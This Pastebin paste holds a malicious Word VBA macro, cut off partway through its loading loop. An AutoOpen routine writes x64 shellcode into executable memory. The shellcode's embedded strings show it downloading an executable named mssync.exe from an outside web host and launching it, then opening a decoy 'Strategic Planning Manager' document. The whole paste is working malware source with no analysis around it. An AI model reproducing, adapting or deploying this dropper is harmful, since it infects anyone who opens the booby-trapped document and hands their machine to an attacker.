Advertisement
Guest User

Untitled

a guest
Dec 23rd, 2018
470
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.70 KB | None | 0 0
  1. Attribute VB_Name = "NewMacros"
  2. Private Declare PtrSafe Function SharpShooter Lib "msvcrt" Alias "_beginthread" (ByVal StartAddress As LongPtr, StackSize As Long, ByVal ArgList As LongPtr) As Long
  3. Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" Alias "VirtualAlloc" (ByVal address As Long, ByVal size As Long, ByVal aloctype As Long, ByVal fprot As Long) As LongPtr
  4. Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal dest As LongPtr, ByRef src As Any, ByVal dlen As Long) As LongPtr
  5. Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" Alias "LoadLibraryA" (ByVal libname As String) As LongPtr
  6. Private Declare PtrSafe Function GetProcAddress Lib "kernel32" Alias "GetProcAddress" (ByVal module As LongPtr, ByVal pname As String) As LongPtr
  7. '``````````````````````````````````````````````````````````````````````````````````
  8. Sub AutoOpen()
  9. On Error GoTo LoneSpirit
  10. '``````````````````````````````````````````````````````````````````````````````````
  11.  
  12. Dim BlockCount As Long, size_count As Long
  13. BlockCount = 3
  14. size_count = 3224
  15. Dim shellcode(2) As Variant
  16. Dim binbuffer(3224) As Byte
  17.  
  18. shellcode(0) = Array(&H48, &H81, &HEC, &HD8, &H4, &H0, &H0, &HC6, &H84, &H24, &HC8, &H1, &H0, &H0, &H75, &HC6, &H84, &H24, &HC9, &H1, &H0, &H0, &H72, &HC6, &H84, &H24, &HCA, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HCB, &H1, &H0, &H0, &H6D, &HC6, &H84, &H24, &HCC, &H1, &H0, &H0, &H6F, &HC6, &H84, &H24, &HCD, &H1, &H0, &H0, &H6E, &HC6, &H84, &H24, &HCE, &H1, &H0, &H0, &H2E, &HC6, &H84, &H24, &HCF, &H1, &H0, &H0, &H64, &HC6, &H84, &H24, &HD0, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HD1, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HD2, &H1, &H0, &H0, &H0, &HC6, &H84, &H24, &HB0, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &HB1, &H3, &H0, &H0, &H68, &HC6, &H84, &H24, &HB2, &H3, &H0, &H0, &H66, &HC6, &H84, &H24, &HB3, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HB4, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, _
  19. &HB5, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HB6, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &HB7, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &HB8, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &HB9, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HBA, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HBB, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HBC, &H3, &H0, &H0, &H0, &HC6, &H44, &H24, &H70, &H6E, &HC6, &H44, &H24, &H71, &H74, &HC6, &H44, &H24, &H72, &H64, &HC6, &H44, &H24, &H73, &H6C, &HC6, &H44, &H24, &H74, &H6C, &HC6, &H44, &H24, &H75, &H2E, &HC6, &H44, &H24, &H76, &H64, &HC6, &H44, &H24, &H77, &H6C, &HC6, &H44, &H24, &H78, &H6C, &HC6, &H44, &H24, &H79, &H0, &HC6, &H84, &H24, &H20, &H4, &H0, &H0, &H6B, &HC6, &H84, &H24, &H21, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H22, &H4, &H0, &H0, &H72, &HC6, &H84, _
  20. &H24, &H23, &H4, &H0, &H0, &H6E, &HC6, &H84, &H24, &H24, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H25, &H4, &H0, &H0, &H6C, &HC6, &H84, &H24, &H26, &H4, &H0, &H0, &H33, &HC6, &H84, &H24, &H27, &H4, &H0, &H0, &H32, &HC6, &H84, &H24, &H28, &H4, &H0, &H0, &H2E, &HC6, &H84, &H24, &H29, &H4, &H0, &H0, &H64, &HC6, &H84, &H24, &H2A, &H4, &H0, &H0, &H6C, &HC6, &H84, &H24, &H2B, &H4, &H0, &H0, &H6C, &HC6, &H84, &H24, &H2C, &H4, &H0, &H0, &H0, &HC6, &H44, &H24, &H60, &H73, &HC6, &H44, &H24, &H61, &H68, &HC6, &H44, &H24, &H62, &H65, &HC6, &H44, &H24, &H63, &H6C, &HC6, &H44, &H24, &H64, &H6C, &HC6, &H44, &H24, &H65, &H33, &HC6, &H44, &H24, &H66, &H32, &HC6, &H44, &H24, &H67, &H0, &HC6, &H84, &H24, &HD8, &H3, &H0, &H0, &H4C, &HC6, &H84, &H24, &HD9, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, _
  21. &HDA, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &HDB, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HDC, &H3, &H0, &H0, &H4C, &HC6, &H84, &H24, &HDD, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &HDE, &H3, &H0, &H0, &H62, &HC6, &H84, &H24, &HDF, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &HE0, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &HE1, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &HE2, &H3, &H0, &H0, &H79, &HC6, &H84, &H24, &HE3, &H3, &H0, &H0, &H41, &HC6, &H84, &H24, &HE4, &H3, &H0, &H0, &H0, &HC6, &H84, &H24, &H10, &H4, &H0, &H0, &H47, &HC6, &H84, &H24, &H11, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H12, &H4, &H0, &H0, &H74, &HC6, &H84, &H24, &H13, &H4, &H0, &H0, &H50, &HC6, &H84, &H24, &H14, &H4, &H0, &H0, &H72, &HC6, &H84, &H24, &H15, &H4, &H0, &H0, &H6F, &HC6, &H84, &H24, &H16, _
  22. &H4, &H0, &H0, &H63, &HC6, &H84, &H24, &H17, &H4, &H0, &H0, &H41, &HC6, &H84, &H24, &H18, &H4, &H0, &H0, &H64, &HC6, &H84, &H24, &H19, &H4, &H0, &H0, &H64, &HC6, &H84, &H24, &H1A, &H4, &H0, &H0, &H72, &HC6, &H84, &H24, &H1B, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H1C, &H4, &H0, &H0, &H73, &HC6, &H84, &H24, &H1D, &H4, &H0, &H0, &H73, &HC6, &H84, &H24, &H1E, &H4, &H0, &H0, &H0, &HC6, &H84, &H24, &H98, &H3, &H0, &H0, &H55, &HC6, &H84, &H24, &H99, &H3, &H0, &H0, &H52, &HC6, &H84, &H24, &H9A, &H3, &H0, &H0, &H4C, &HC6, &H84, &H24, &H9B, &H3, &H0, &H0, &H44, &HC6, &H84, &H24, &H9C, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H9D, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &H9E, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H9F, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HA0, &H3, _
  23. &H0, &H0, &H6F, &HC6, &H84, &H24, &HA1, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &HA2, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HA3, &H3, &H0, &H0, &H54, &HC6, &H84, &H24, &HA4, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HA5, &H3, &H0, &H0, &H46, &HC6, &H84, &H24, &HA6, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &HA7, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HA8, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &HA9, &H3, &H0, &H0, &H41, &HC6, &H84, &H24, &HAA, &H3, &H0, &H0, &H0, &HC6, &H84, &H24, &H50, &H3, &H0, &H0, &H53, &HC6, &H84, &H24, &H51, &H3, &H0, &H0, &H48, &HC6, &H84, &H24, &H52, &H3, &H0, &H0, &H47, &HC6, &H84, &H24, &H53, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H54, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H55, &H3, &H0, &H0, &H46, &HC6, &H84, &H24, &H56, &H3, &H0, _
  24. &H0, &H6F, &HC6, &H84, &H24, &H57, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &H58, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &H59, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H5A, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H5B, &H3, &H0, &H0, &H50, &HC6, &H84, &H24, &H5C, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H5D, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H5E, &H3, &H0, &H0, &H68, &HC6, &H84, &H24, &H5F, &H3, &H0, &H0, &H41, &HC6, &H84, &H24, &H60, &H3, &H0, &H0, &H0, &HC6, &H44, &H24, &H58, &H73, &HC6, &H44, &H24, &H59, &H74, &HC6, &H44, &H24, &H5A, &H72, &HC6, &H44, &H24, &H5B, &H63, &HC6, &H44, &H24, &H5C, &H70, &HC6, &H44, &H24, &H5D, &H79, &HC6, &H44, &H24, &H5E, &H0, &HC6, &H84, &H24, &HB8, &H1, &H0, &H0, &H73, &HC6, &H84, &H24, &HB9, &H1, &H0, &H0, &H74, &HC6, &H84, &H24, &HBA, _
  25. &H1, &H0, &H0, &H72, &HC6, &H84, &H24, &HBB, &H1, &H0, &H0, &H63, &HC6, &H84, &H24, &HBC, &H1, &H0, &H0, &H61, &HC6, &H84, &H24, &HBD, &H1, &H0, &H0, &H74, &HC6, &H84, &H24, &HBE, &H1, &H0, &H0, &H0, &HC6, &H84, &H24, &H88, &H3, &H0, &H0, &H43, &HC6, &H84, &H24, &H89, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H8A, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H8B, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H8C, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H8D, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H8E, &H3, &H0, &H0, &H50, &HC6, &H84, &H24, &H8F, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H90, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H91, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H92, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H93, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H94, &H3, _
  26. &H0, &H0, &H73, &HC6, &H84, &H24, &H95, &H3, &H0, &H0, &H41, &HC6, &H84, &H24, &H96, &H3, &H0, &H0, &H0, &HC6, &H44, &H24, &H50, &H6D, &HC6, &H44, &H24, &H51, &H65, &HC6, &H44, &H24, &H52, &H6D, &HC6, &H44, &H24, &H53, &H73, &HC6, &H44, &H24, &H54, &H65, &HC6, &H44, &H24, &H55, &H74, &HC6, &H44, &H24, &H56, &H0, &HC6, &H84, &H24, &HA8, &H1, &H0, &H0, &H53, &HC6, &H84, &H24, &HA9, &H1, &H0, &H0, &H68, &HC6, &H84, &H24, &HAA, &H1, &H0, &H0, &H65, &HC6, &H84, &H24, &HAB, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HAC, &H1, &H0, &H0, &H6C, &HC6, &H84, &H24, &HAD, &H1, &H0, &H0, &H45, &HC6, &H84, &H24, &HAE, &H1, &H0, &H0, &H78, &HC6, &H84, &H24, &HAF, &H1, &H0, &H0, &H65, &HC6, &H84, &H24, &HB0, &H1, &H0, &H0, &H63, &HC6, &H84, &H24, &HB1, &H1, &H0, &H0, &H75, &HC6, &H84, &H24, _
  27. &HB2, &H1, &H0, &H0, &H74, &HC6, &H84, &H24, &HB3, &H1, &H0, &H0, &H65, &HC6, &H84, &H24, &HB4, &H1, &H0, &H0, &H41, &HC6, &H84, &H24, &HB5, &H1, &H0, &H0, &H0, &H48, &HB8, &H81, &H88, &H88, &H88, &H88, &H88, &HAD, &HDE, &H48, &H89, &H84, &H24, &H80, &H0, &H0, &H0)
  28. shellcode(1) = Array(&H48, &HB8, &H82, &H88, &H88, &H88, &H88, &H88, &HAD, &HDE, &H48, &H89, &H84, &H24, &HA0, &H1, &H0, &H0, &H48, &H8D, &H8C, &H24, &HC8, &H1, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &H98, &H3, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H44, &H24, &H68, &H48, &H8D, &H8C, &H24, &HB0, &H3, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &H50, &H3, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &HD8, &H1, &H0, &H0, &H48, &H8D, &H4C, &H24, &H70, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H54, &H24, &H58, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &HC0, &H1, &H0, &H0, &H48, &H8D, &H4C, &H24, &H70, &HFF, _
  29. &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &HB8, &H1, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &H70, &H3, &H0, &H0, &H48, &H8D, &H8C, &H24, &H20, &H4, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &H88, &H3, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &H68, &H3, &H0, &H0, &H48, &H8D, &H4C, &H24, &H70, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H54, &H24, &H50, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, &H0, &H48, &H89, &H84, &H24, &HC8, &H3, &H0, &H0, &H48, &H8D, &H4C, &H24, &H60, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &HA8, &H1, &H0, &H0, &H48, &H8B, &HC8, &HFF, &H94, &H24, &HA0, &H1, &H0, _
  30. &H0, &H48, &H89, &H84, &H24, &HC0, &H3, &H0, &H0, &HC6, &H84, &H24, &HE8, &H3, &H0, &H0, &H68, &HC6, &H84, &H24, &HE9, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &HEA, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &HEB, &H3, &H0, &H0, &H70, &HC6, &H84, &H24, &HEC, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &HED, &H3, &H0, &H0, &H3A, &HC6, &H84, &H24, &HEE, &H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &HEF, &H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &HF0, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &HF1, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &HF2, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &HF3, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &HF4, &H3, &H0, &H0, &H6B, &HC6, &H84, &H24, &HF5, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &HF6, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &HF7, &H3, &H0, &H0, &H67, _
  31. &HC6, &H84, &H24, &HF8, &H3, &H0, &H0, &H6B, &HC6, &H84, &H24, &HF9, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HFA, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &HFB, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &HFC, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &HFD, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &HFE, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HFF, &H3, &H0, &H0, &H6D, &HC6, &H84, &H24, &H0, &H4, &H0, &H0, &H2E, &HC6, &H84, &H24, &H1, &H4, &H0, &H0, &H73, &HC6, &H84, &H24, &H2, &H4, &H0, &H0, &H67, &HC6, &H84, &H24, &H3, &H4, &H0, &H0, &H2F, &HC6, &H84, &H24, &H4, &H4, &H0, &H0, &H71, &HC6, &H84, &H24, &H5, &H4, &H0, &H0, &H75, &HC6, &H84, &H24, &H6, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &H7, &H4, &H0, &H0, &H72, &HC6, &H84, &H24, &H8, &H4, &H0, &H0, &H79, &HC6, _
  32. &H84, &H24, &H9, &H4, &H0, &H0, &H2E, &HC6, &H84, &H24, &HA, &H4, &H0, &H0, &H70, &HC6, &H84, &H24, &HB, &H4, &H0, &H0, &H68, &HC6, &H84, &H24, &HC, &H4, &H0, &H0, &H70, &HC6, &H84, &H24, &HD, &H4, &H0, &H0, &H0, &HC6, &H84, &H24, &H78, &H3, &H0, &H0, &H5C, &HC6, &H84, &H24, &H79, &H3, &H0, &H0, &H6D, &HC6, &H84, &H24, &H7A, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H7B, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H7C, &H3, &H0, &H0, &H79, &HC6, &H84, &H24, &H7D, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H7E, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H7F, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H80, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H81, &H3, &H0, &H0, &H78, &HC6, &H84, &H24, &H82, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H83, &H3, &H0, &H0, &H0, &H48, &H8D, _
  33. &H84, &H24, &HE0, &H1, &H0, &H0, &H48, &H89, &H44, &H24, &H20, &H45, &H33, &HC9, &H45, &H33, &HC0, &HBA, &H7, &H0, &H0, &H0, &H33, &HC9, &HFF, &H94, &H24, &HD8, &H1, &H0, &H0, &H48, &H8D, &H94, &H24, &H78, &H3, &H0, &H0, &H48, &H8D, &H8C, &H24, &HE0, &H1, &H0, &H0, &HFF, &H94, &H24, &H70, &H3, &H0, &H0, &HC6, &H84, &H24, &H10, &H3, &H0, &H0, &H68, &HC6, &H84, &H24, &H11, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H12, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H13, &H3, &H0, &H0, &H70, &HC6, &H84, &H24, &H14, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H15, &H3, &H0, &H0, &H3A, &HC6, &H84, &H24, &H16, &H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &H17, &H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &H18, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &H19, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, _
  34. &H1A, &H3, &H0, &H0, &H77, &HC6, &H84, &H24, &H1B, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H1C, &H3, &H0, &H0, &H6B, &HC6, &H84, &H24, &H1D, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H1E, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H1F, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H20, &H3, &H0, &H0, &H6B, &HC6, &H84, &H24, &H21, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H22, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H23, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &H24, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H25, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H26, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H27, &H3, &H0, &H0, &H6D, &HC6, &H84, &H24, &H28, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H29, &H3, &H0, &H0, &H73, &HC6, &H84, &H24, &H2A, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H2B, _
  35. &H3, &H0, &H0, &H2F, &HC6, &H84, &H24, &H2C, &H3, &H0, &H0, &H53, &HC6, &H84, &H24, &H2D, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H2E, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H2F, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H30, &H3, &H0, &H0, &H74, &HC6, &H84, &H24, &H31, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H32, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H33, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H34, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H35, &H3, &H0, &H0, &H20, &HC6, &H84, &H24, &H36, &H3, &H0, &H0, &H50, &HC6, &H84, &H24, &H37, &H3, &H0, &H0, &H6C, &HC6, &H84, &H24, &H38, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H39, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H3A, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H3B, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H3C, &H3, _
  36. &H0, &H0, &H6E, &HC6, &H84, &H24, &H3D, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H3E, &H3, &H0, &H0, &H20, &HC6, &H84, &H24, &H3F, &H3, &H0, &H0, &H4D, &HC6, &H84, &H24, &H40, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H41, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H42, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H43, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H44, &H3, &H0, &H0, &H65, &HC6, &H84, &H24, &H45, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &H46, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &H47, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &H48, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &H49, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &H4A, &H3, &H0, &H0, &H0, &HC6, &H84, &H24, &HF0, &H2, &H0, &H0, &H5C, &HC6, &H84, &H24, &HF1, &H2, &H0, &H0, &H53, &HC6, &H84, &H24, &HF2, &H2, &H0, _
  37. &H0, &H74, &HC6, &H84, &H24, &HF3, &H2, &H0, &H0, &H72, &HC6, &H84, &H24, &HF4, &H2, &H0, &H0, &H61, &HC6, &H84, &H24, &HF5, &H2, &H0, &H0, &H74, &HC6, &H84, &H24, &HF6, &H2, &H0, &H0, &H65, &HC6, &H84, &H24, &HF7, &H2, &H0, &H0, &H67, &HC6, &H84, &H24, &HF8, &H2)
  38. shellcode(2) = Array(&H0, &H0, &H69, &HC6, &H84, &H24, &HF9, &H2, &H0, &H0, &H63, &HC6, &H84, &H24, &HFA, &H2, &H0, &H0, &H20, &HC6, &H84, &H24, &HFB, &H2, &H0, &H0, &H50, &HC6, &H84, &H24, &HFC, &H2, &H0, &H0, &H6C, &HC6, &H84, &H24, &HFD, &H2, &H0, &H0, &H61, &HC6, &H84, &H24, &HFE, &H2, &H0, &H0, &H6E, &HC6, &H84, &H24, &HFF, &H2, &H0, &H0, &H6E, &HC6, &H84, &H24, &H0, &H3, &H0, &H0, &H69, &HC6, &H84, &H24, &H1, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H2, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H3, &H3, &H0, &H0, &H20, &HC6, &H84, &H24, &H4, &H3, &H0, &H0, &H4D, &HC6, &H84, &H24, &H5, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H6, &H3, &H0, &H0, &H6E, &HC6, &H84, &H24, &H7, &H3, &H0, &H0, &H61, &HC6, &H84, &H24, &H8, &H3, &H0, &H0, &H67, &HC6, &H84, &H24, &H9, &H3, &H0, &H0, _
  39. &H65, &HC6, &H84, &H24, &HA, &H3, &H0, &H0, &H72, &HC6, &H84, &H24, &HB, &H3, &H0, &H0, &H2E, &HC6, &H84, &H24, &HC, &H3, &H0, &H0, &H64, &HC6, &H84, &H24, &HD, &H3, &H0, &H0, &H6F, &HC6, &H84, &H24, &HE, &H3, &H0, &H0, &H63, &HC6, &H84, &H24, &HF, &H3, &H0, &H0, &H0, &H48, &H8D, &H84, &H24, &H90, &H0, &H0, &H0, &H48, &H89, &H44, &H24, &H20, &H45, &H33, &HC9, &H45, &H33, &HC0, &HBA, &H1C, &H0, &H0, &H0, &H33, &HC9, &HFF, &H94, &H24, &HD8, &H1, &H0, &H0, &H48, &H8D, &H94, &H24, &HF0, &H2, &H0, &H0, &H48, &H8D, &H8C, &H24, &H90, &H0, &H0, &H0, &HFF, &H94, &H24, &H70, &H3, &H0, &H0, &H48, &HC7, &H44, &H24, &H20, &H0, &H0, &H0, &H0, &H45, &H33, &HC9, &H4C, &H8D, &H84, &H24, &HE0, &H1, &H0, &H0, &H48, &H8D, &H94, &H24, &HE8, &H3, &H0, &H0, &H33, &HC9, &HFF, &H54, _
  40. &H24, &H68, &H89, &H84, &H24, &HD0, &H3, &H0, &H0, &H83, &HBC, &H24, &HD0, &H3, &H0, &H0, &H0, &HF, &H8C, &HA1, &H0, &H0, &H0, &HC7, &H84, &H24, &H50, &H4, &H0, &H0, &H68, &H0, &H0, &H0, &HC7, &H84, &H24, &H8C, &H4, &H0, &H0, &H1, &H0, &H0, &H0, &H33, &HC0, &H66, &H89, &H84, &H24, &H90, &H4, &H0, &H0, &H41, &HB8, &H68, &H0, &H0, &H0, &H33, &HD2, &H48, &H8D, &H8C, &H24, &H50, &H4, &H0, &H0, &HFF, &H94, &H24, &HC8, &H3, &H0, &H0, &H41, &HB8, &H18, &H0, &H0, &H0, &H33, &HD2, &H48, &H8D, &H8C, &H24, &H30, &H4, &H0, &H0, &HFF, &H94, &H24, &HC8, &H3, &H0, &H0, &H48, &H8D, &H84, &H24, &H30, &H4, &H0, &H0, &H48, &H89, &H44, &H24, &H48, &H48, &H8D, &H84, &H24, &H50, &H4, &H0, &H0, &H48, &H89, &H44, &H24, &H40, &H48, &HC7, &H44, &H24, &H38, &H0, &H0, &H0, &H0, &H48, _
  41. &HC7, &H44, &H24, &H30, &H0, &H0, &H0, &H0, &HC7, &H44, &H24, &H28, &H0, &H0, &H0, &H0, &HC7, &H44, &H24, &H20, &H0, &H0, &H0, &H0, &H45, &H33, &HC9, &H45, &H33, &HC0, &H48, &H8D, &H94, &H24, &HE0, &H1, &H0, &H0, &H33, &HC9, &HFF, &H94, &H24, &H68, &H3, &H0, &H0, &H48, &HC7, &H44, &H24, &H20, &H0, &H0, &H0, &H0, &H45, &H33, &HC9, &H4C, &H8D, &H84, &H24, &H90, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &H10, &H3, &H0, &H0, &H33, &HC9, &HFF, &H54, &H24, &H68, &H89, &H84, &H24, &HD0, &H3, &H0, &H0, &H83, &HBC, &H24, &HD0, &H3, &H0, &H0, &H0, &H7C, &H55, &HC6, &H84, &H24, &HC0, &H4, &H0, &H0, &H6F, &HC6, &H84, &H24, &HC1, &H4, &H0, &H0, &H70, &HC6, &H84, &H24, &HC2, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &HC3, &H4, &H0, &H0, &H6E, &HC6, &H84, &H24, &HC4, &H4, &H0, &H0, _
  42. &H0, &HC7, &H44, &H24, &H28, &H1, &H0, &H0, &H0, &H48, &HC7, &H44, &H24, &H20, &H0, &H0, &H0, &H0, &H45, &H33, &HC9, &H4C, &H8D, &H84, &H24, &H90, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &HC0, &H4, &H0, &H0, &H33, &HC9, &HFF, &H94, &H24, &HC0, &H3, &H0, &H0, &H48, &H8D, &H8C, &H24, &HC8, &H1, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H8C, &H24, &HB0, &H3, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H4C, &H24, &H70, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H8C, &H24, &H20, &H4, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H81, &HC4, &HD8, &H4, &H0, &H0, &HC3, &HCC, &HCC)
  43. '``````````````````````````````````````````````````````````````````````````````````
  44. Dim kernel32 As LongPtr, addr_LoadLibraryA As LongPtr, addr_GetProcAddr As LongPtr
  45. Dim rising_sun As String
  46. rising_sun = "kernel32"
  47. kernel32 = LoadLibraryA("kernel32")
  48. addr_LoadLibraryA = GetProcAddress(kernel32, "LoadLibraryA")
  49. addr_GetProcAddr = GetProcAddress(kernel32, "GetProcAddress")
  50. Dim twefasfg As Long, rgggsdfa As Long
  51. twefasfg = 1265
  52. rgggsdfa = 1283
  53. '``````````````````````````````````````````````````````````````````````````````````
  54. Dim eIndex1 As Long, eIndex2 As Long, eValue As Long
  55. Dim vAddress As LongPtr, Result As LongPtr
  56. vAddress = VirtualAlloc(0, 3224, &H1000, &H40)
  57. size_count = 0
  58. '``````````````````````````````````````````````````````````````````````````````````
  59. For eIndex1 = 0 To BlockCount - 1
  60. For eIndex2 = 0 To UBound(shellcode(eIndex1))
  61. eValue = shellcode(eIndex1)(eIndex2)
